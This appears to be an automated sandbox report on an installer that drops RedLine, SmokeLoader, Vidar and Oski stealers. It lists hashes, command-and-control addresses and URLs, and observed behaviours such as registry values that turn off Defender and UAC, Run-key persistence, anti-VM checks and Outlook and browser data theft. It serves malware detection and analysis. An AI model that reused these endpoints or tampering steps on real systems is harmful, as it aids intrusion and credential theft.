Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
13-10-2021 18:35
211013-w8lxmaegdr 1013-10-2021 12:38
211013-pvkdbadhdm 1013-10-2021 05:30
211013-f7nrtsdfa3 1012-10-2021 20:25
211012-y7qwasdbh4 1011-10-2021 21:02
211011-zvywtaabdq 10Analysis
-
max time kernel
1812s -
max time network
1819s -
platform
windows11_x64 -
resource
win11 -
submitted
13-10-2021 05:30
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
26f28bf2dc2b6afc0dd99cb6ea3879b8
-
SHA1
9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05
-
SHA256
5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa
-
SHA512
5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b
Malware Config
Extracted
redline
media12
91.121.67.60:2151
Extracted
redline
ANI
45.142.215.47:27643
Extracted
smokeloader
2020
http://linavanandr11.club/
http://iselaharty12.club/
http://giovaninardo13.club/
http://zayneliann14.club/
http://zorinosali15.club/
Signatures
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5508 4936 rundll32.exe 21 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5320 4936 rundll32.exe 21 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7520 4936 rundll32.exe 21 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral4/memory/2400-277-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/2400-280-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/2896-281-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/2896-279-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 20 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exegcleaner.exeWerFault.exeWerFault.exeMoUsoCoreWorker.execmd.exeWerFault.exei1SR0Sa2ONI4aPlA1UigAn2R.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid Process procid_target PID 3724 created 2008 3724 WerFault.exe 110 PID 1692 created 2912 1692 WerFault.exe 100 PID 1100 created 2200 1100 WerFault.exe 107 PID 5732 created 5560 5732 144 PID 5012 created 1044 5012 WerFault.exe 130 PID 5468 created 3504 5468 gcleaner.exe 181 PID 6820 created 1176 6820 WerFault.exe 167 PID 6700 created 5388 6700 WerFault.exe 156 PID 7036 created 5888 7036 MoUsoCoreWorker.exe 165 PID 5908 created 5652 5908 cmd.exe 161 PID 2900 created 5588 2900 WerFault.exe 206 PID 4900 created 5496 4900 i1SR0Sa2ONI4aPlA1UigAn2R.exe 208 PID 5872 created 6304 5872 WerFault.exe 213 PID 7340 created 6748 7340 WerFault.exe 332 PID 2668 created 6676 2668 WerFault.exe 287 PID 7436 created 4048 7436 WerFault.exe 286 PID 8088 created 7400 8088 WerFault.exe 321 PID 2088 created 17256 2088 WerFault.exe 344 PID 7468 created 2460 7468 WerFault.exe 377 PID 6212 created 5468 6212 WerFault.exe 362 -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
svchost.exedescription pid Process procid_target PID 6964 created 6776 6964 svchost.exe 241 PID 6964 created 6776 6964 svchost.exe 241 PID 6964 created 12432 6964 svchost.exe 433 PID 6964 created 12536 6964 svchost.exe 437 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
Processes:
resource yara_rule behavioral4/memory/1044-486-0x0000000000810000-0x00000000008E6000-memory.dmp family_vidar behavioral4/memory/5388-566-0x0000000003440000-0x0000000003516000-memory.dmp family_vidar behavioral4/memory/5496-742-0x00000000007E0000-0x00000000008B6000-memory.dmp family_vidar -
Processes:
resource yara_rule behavioral4/files/0x000100000002b1bb-158.dat aspack_v212_v242 behavioral4/files/0x000100000002b1bb-157.dat aspack_v212_v242 behavioral4/files/0x000100000002b1bc-156.dat aspack_v212_v242 behavioral4/files/0x000100000002b1be-164.dat aspack_v212_v242 behavioral4/files/0x000100000002b1be-163.dat aspack_v212_v242 behavioral4/files/0x000100000002b1bc-162.dat aspack_v212_v242 -
Blocklisted process makes network request 6 IoCs
Processes:
msiexec.exeMsiExec.exepowershell.exeflow pid Process 258 6500 msiexec.exe 269 6500 msiexec.exe 345 9404 MsiExec.exe 353 9404 MsiExec.exe 391 3508 powershell.exe 392 3508 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
DYbALA.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeMon204014f13870f5e.exeMon20762bc3f6.exeMon20927aab1e5.exeMon206b909958ed4.exeMon206d48916f93c5.exeMon203f01ac7e6.exeMon209c830507d573.exeMon2083f8d8970a0b2d.exeMon20b6f9d5bd03a305.exeMon20d3b8b752.exeMon209b3da1556b9a317.exe1378103.scrLzmwAqmV.exe09xU.exEMon209c830507d573.exeMon20927aab1e5.exe2303097.scrinst1.exe6821963.scrDownFlSetup110.exe7406868.scrSoft1ww01.exe04JJ3RxmoOrkjUmTE75tZicJ.exeConhost.exeWerFault.exeChrome 5.exesetup.tmpsetup.exeWinHoster.exerv0IoLjCTiAVqq_ZvgumHf0K.exer0qEA6ZNISqo0Tq09aQk8H2C.exeH86qWBuHzWZmGITuNE3X9SxF.exeqvgjxjaIyEOYZSsKaNkUA6BG.exeWkcWFH3P8gRGZgykU0ledS3T.exesetup.tmp2512986.scrLzmwAqmV.exekcqx8N9nfA3k0vDFYVlSf29e.exe8167987.scrcYUc7wuTDsuE7h7XbhShNkR8.exe1092981.scr7365935.scrH86qWBuHzWZmGITuNE3X9SxF.exe5472694.scr5108028.scrpostback.exeH8jw_4TmnGzyEx6PHssgdCoy.exeYY4xjF_W3oy_kHfCFkzkO1C7.exebWLj9lfauqRfDndQtgrXhtd9.exeB3xGPO7uW7v2ADymt3FoIKP9.exeRkZLuBmhzDRH1tonlD2y9chm.exeRIp6KOn6bTquopPdWGDEO8OZ.exeWPWSLBK9XTV3JK3FvDUtGufX.exebo5pmCap6uvDHfHJN3UgwaJy.exePm3g9ctfYddsVPVoDBAKdcm8.exelbbD1Mb94469URLfxW1wrRWT.exeDXiS7jLx9LBM1kEuISf6_JlF.exesBagaJbRYGdhvlfxFPDGBfzx.exeWzMNlEBCfd7fUc9yVHJGL8mN.exehQVevJHT7ifZkZy5q0HwRySe.exeiHWTBUxIpQQ2V0wNGbIoQRfC.exeSGQDazRjK3dj9h5PYpsGlAad.exepid Process 1108 setup_installer.exe 1896 setup_install.exe 2200 Mon204014f13870f5e.exe 3440 Mon20762bc3f6.exe 1668 Mon20927aab1e5.exe 2912 Mon206b909958ed4.exe 3168 Mon206d48916f93c5.exe 2992 Mon203f01ac7e6.exe 920 Mon209c830507d573.exe 2008 Mon2083f8d8970a0b2d.exe 1268 Mon20b6f9d5bd03a305.exe 976 Mon20d3b8b752.exe 1192 Mon209b3da1556b9a317.exe 3108 1378103.scr 3976 LzmwAqmV.exe 3720 09xU.exE 2400 Mon209c830507d573.exe 2896 Mon20927aab1e5.exe 4852 2303097.scr 4264 inst1.exe 1492 6821963.scr 4692 DownFlSetup110.exe 4120 7406868.scr 1044 Soft1ww01.exe 5156 04JJ3RxmoOrkjUmTE75tZicJ.exe 5252 Conhost.exe 5568 WerFault.exe 5748 Chrome 5.exe 5848 setup.tmp 1528 setup.exe 6052 WinHoster.exe 5352 rv0IoLjCTiAVqq_ZvgumHf0K.exe 5528 r0qEA6ZNISqo0Tq09aQk8H2C.exe 2260 H86qWBuHzWZmGITuNE3X9SxF.exe 5388 qvgjxjaIyEOYZSsKaNkUA6BG.exe 5652 WkcWFH3P8gRGZgykU0ledS3T.exe 5720 setup.tmp 5772 2512986.scr 5888 LzmwAqmV.exe 1176 kcqx8N9nfA3k0vDFYVlSf29e.exe 5920 8167987.scr 5396 cYUc7wuTDsuE7h7XbhShNkR8.exe 1512 1092981.scr 5636 7365935.scr 3504 H86qWBuHzWZmGITuNE3X9SxF.exe 1652 5472694.scr 2036 5108028.scr 2164 postback.exe 3208 H8jw_4TmnGzyEx6PHssgdCoy.exe 5724 YY4xjF_W3oy_kHfCFkzkO1C7.exe 6116 bWLj9lfauqRfDndQtgrXhtd9.exe 5312 B3xGPO7uW7v2ADymt3FoIKP9.exe 5496 RkZLuBmhzDRH1tonlD2y9chm.exe 6024 RIp6KOn6bTquopPdWGDEO8OZ.exe 5588 WPWSLBK9XTV3JK3FvDUtGufX.exe 1464 bo5pmCap6uvDHfHJN3UgwaJy.exe 4048 Pm3g9ctfYddsVPVoDBAKdcm8.exe 6000 lbbD1Mb94469URLfxW1wrRWT.exe 4244 DXiS7jLx9LBM1kEuISf6_JlF.exe 956 sBagaJbRYGdhvlfxFPDGBfzx.exe 4960 WzMNlEBCfd7fUc9yVHJGL8mN.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6452 iHWTBUxIpQQ2V0wNGbIoQRfC.exe 6476 SGQDazRjK3dj9h5PYpsGlAad.exe -
Sets service image path in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
2303097.scr8167987.scrsBagaJbRYGdhvlfxFPDGBfzx.exelbbD1Mb94469URLfxW1wrRWT.exeSGQDazRjK3dj9h5PYpsGlAad.exemsiexec.exeDXiS7jLx9LBM1kEuISf6_JlF.exe7235880.scrRIp6KOn6bTquopPdWGDEO8OZ.exeB3xGPO7uW7v2ADymt3FoIKP9.exe1092981.scrWzMNlEBCfd7fUc9yVHJGL8mN.exer0qEA6ZNISqo0Tq09aQk8H2C.exebWLj9lfauqRfDndQtgrXhtd9.exe5108028.scr6482018.scrdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2303097.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8167987.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sBagaJbRYGdhvlfxFPDGBfzx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion lbbD1Mb94469URLfxW1wrRWT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SGQDazRjK3dj9h5PYpsGlAad.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2303097.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion DXiS7jLx9LBM1kEuISf6_JlF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7235880.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RIp6KOn6bTquopPdWGDEO8OZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion B3xGPO7uW7v2ADymt3FoIKP9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion B3xGPO7uW7v2ADymt3FoIKP9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion DXiS7jLx9LBM1kEuISf6_JlF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1092981.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WzMNlEBCfd7fUc9yVHJGL8mN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RIp6KOn6bTquopPdWGDEO8OZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SGQDazRjK3dj9h5PYpsGlAad.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion r0qEA6ZNISqo0Tq09aQk8H2C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bWLj9lfauqRfDndQtgrXhtd9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7235880.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5108028.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion r0qEA6ZNISqo0Tq09aQk8H2C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WzMNlEBCfd7fUc9yVHJGL8mN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bWLj9lfauqRfDndQtgrXhtd9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6482018.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5108028.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8167987.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sBagaJbRYGdhvlfxFPDGBfzx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion lbbD1Mb94469URLfxW1wrRWT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6482018.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1092981.scr -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exerundll32.exesetup.tmpsetup.tmpH8jw_4TmnGzyEx6PHssgdCoy.exerundll32.exesetup.exerundll32.exe0b5u9vmZhup2k81jwi8q31nK.tmpmsiexec.exerundll32.exerv0IoLjCTiAVqq_ZvgumHf0K.exeCalculator%20Installation.exeinstaller.exeCalculator.exeautosubplayer.exerundll32.exeJzyjfnl.exeCalculator.exeMsiExec.exeMsiExec.exeCalculator.exeCalculator.exeCalculator.exeMsiExec.exepid Process 1896 setup_install.exe 1896 setup_install.exe 1896 setup_install.exe 1896 setup_install.exe 1896 setup_install.exe 5560 rundll32.exe 5848 setup.tmp 5720 setup.tmp 3208 H8jw_4TmnGzyEx6PHssgdCoy.exe 3208 H8jw_4TmnGzyEx6PHssgdCoy.exe 2068 rundll32.exe 3208 H8jw_4TmnGzyEx6PHssgdCoy.exe 660 setup.exe 660 setup.exe 6064 rundll32.exe 6064 rundll32.exe 4452 0b5u9vmZhup2k81jwi8q31nK.tmp 7136 msiexec.exe 7136 msiexec.exe 7400 rundll32.exe 5352 rv0IoLjCTiAVqq_ZvgumHf0K.exe 5352 rv0IoLjCTiAVqq_ZvgumHf0K.exe 5352 rv0IoLjCTiAVqq_ZvgumHf0K.exe 17176 Calculator%20Installation.exe 17296 installer.exe 17296 installer.exe 660 setup.exe 660 setup.exe 6968 Calculator.exe 660 setup.exe 3372 autosubplayer.exe 6968 Calculator.exe 6968 Calculator.exe 660 setup.exe 3208 H8jw_4TmnGzyEx6PHssgdCoy.exe 2460 rundll32.exe 17296 installer.exe 5432 Jzyjfnl.exe 3372 autosubplayer.exe 7032 Calculator.exe 3532 MsiExec.exe 1952 MsiExec.exe 3532 MsiExec.exe 8220 Calculator.exe 8220 Calculator.exe 8220 Calculator.exe 8256 Calculator.exe 8256 Calculator.exe 8256 Calculator.exe 1952 MsiExec.exe 8308 Calculator.exe 8308 Calculator.exe 8308 Calculator.exe 8220 Calculator.exe 9404 MsiExec.exe 9404 MsiExec.exe 9404 MsiExec.exe 9404 MsiExec.exe 9404 MsiExec.exe 9404 MsiExec.exe 9404 MsiExec.exe 9404 MsiExec.exe 9404 MsiExec.exe 3372 autosubplayer.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral4/files/0x000600000000cf95-319.dat themida behavioral4/files/0x000600000000cf95-299.dat themida -
Processes:
hQVevJHT7ifZkZy5q0HwRySe.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" hQVevJHT7ifZkZy5q0HwRySe.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features hQVevJHT7ifZkZy5q0HwRySe.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths hQVevJHT7ifZkZy5q0HwRySe.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions hQVevJHT7ifZkZy5q0HwRySe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe = "0" hQVevJHT7ifZkZy5q0HwRySe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" hQVevJHT7ifZkZy5q0HwRySe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" hQVevJHT7ifZkZy5q0HwRySe.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection hQVevJHT7ifZkZy5q0HwRySe.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet hQVevJHT7ifZkZy5q0HwRySe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" hQVevJHT7ifZkZy5q0HwRySe.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
rv0IoLjCTiAVqq_ZvgumHf0K.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts rv0IoLjCTiAVqq_ZvgumHf0K.exe -
Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
Processes:
rv0IoLjCTiAVqq_ZvgumHf0K.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook rv0IoLjCTiAVqq_ZvgumHf0K.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook rv0IoLjCTiAVqq_ZvgumHf0K.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook rv0IoLjCTiAVqq_ZvgumHf0K.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook rv0IoLjCTiAVqq_ZvgumHf0K.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook rv0IoLjCTiAVqq_ZvgumHf0K.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rv0IoLjCTiAVqq_ZvgumHf0K.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook rv0IoLjCTiAVqq_ZvgumHf0K.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook rv0IoLjCTiAVqq_ZvgumHf0K.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
Processes:
setup.exeaipackagechainer.exeCalculator%20Installation.exe6821963.scrDYbALA.exemsedge.exedescription ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --oYd2f1" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Calculator%20Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 6821963.scr Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Lenemukoshu.exe\"" DYbALA.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --oYd2f1" Calculator%20Installation.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
bWLj9lfauqRfDndQtgrXhtd9.exeRIp6KOn6bTquopPdWGDEO8OZ.exeWzMNlEBCfd7fUc9yVHJGL8mN.exehQVevJHT7ifZkZy5q0HwRySe.exe6482018.scr7235880.scr1092981.scrDXiS7jLx9LBM1kEuISf6_JlF.exeB3xGPO7uW7v2ADymt3FoIKP9.exeSGQDazRjK3dj9h5PYpsGlAad.exer0qEA6ZNISqo0Tq09aQk8H2C.exelbbD1Mb94469URLfxW1wrRWT.exe2303097.scr8167987.scrsBagaJbRYGdhvlfxFPDGBfzx.exe5108028.scrdescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bWLj9lfauqRfDndQtgrXhtd9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RIp6KOn6bTquopPdWGDEO8OZ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WzMNlEBCfd7fUc9yVHJGL8mN.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" hQVevJHT7ifZkZy5q0HwRySe.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6482018.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7235880.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1092981.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA DXiS7jLx9LBM1kEuISf6_JlF.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B3xGPO7uW7v2ADymt3FoIKP9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SGQDazRjK3dj9h5PYpsGlAad.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hQVevJHT7ifZkZy5q0HwRySe.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA r0qEA6ZNISqo0Tq09aQk8H2C.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA lbbD1Mb94469URLfxW1wrRWT.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2303097.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8167987.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sBagaJbRYGdhvlfxFPDGBfzx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5108028.scr -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Calculator%20Installation.exeinstaller.exemsiexec.exeJzyjfnl.exedescription ioc Process File opened (read-only) \??\R: Calculator%20Installation.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\B: Calculator%20Installation.exe File opened (read-only) \??\V: Calculator%20Installation.exe File opened (read-only) \??\W: Calculator%20Installation.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\X: Calculator%20Installation.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: Calculator%20Installation.exe File opened (read-only) \??\I: Calculator%20Installation.exe File opened (read-only) \??\Q: Calculator%20Installation.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: Calculator%20Installation.exe File opened (read-only) \??\P: Calculator%20Installation.exe File opened (read-only) \??\T: Calculator%20Installation.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: Calculator%20Installation.exe File opened (read-only) \??\O: Calculator%20Installation.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\E: Calculator%20Installation.exe File opened (read-only) \??\F: Calculator%20Installation.exe File opened (read-only) \??\M: Calculator%20Installation.exe File opened (read-only) \??\Y: Calculator%20Installation.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\N: Calculator%20Installation.exe File opened (read-only) \??\S: Calculator%20Installation.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: Jzyjfnl.exe File opened (read-only) \??\V: msiexec.exe 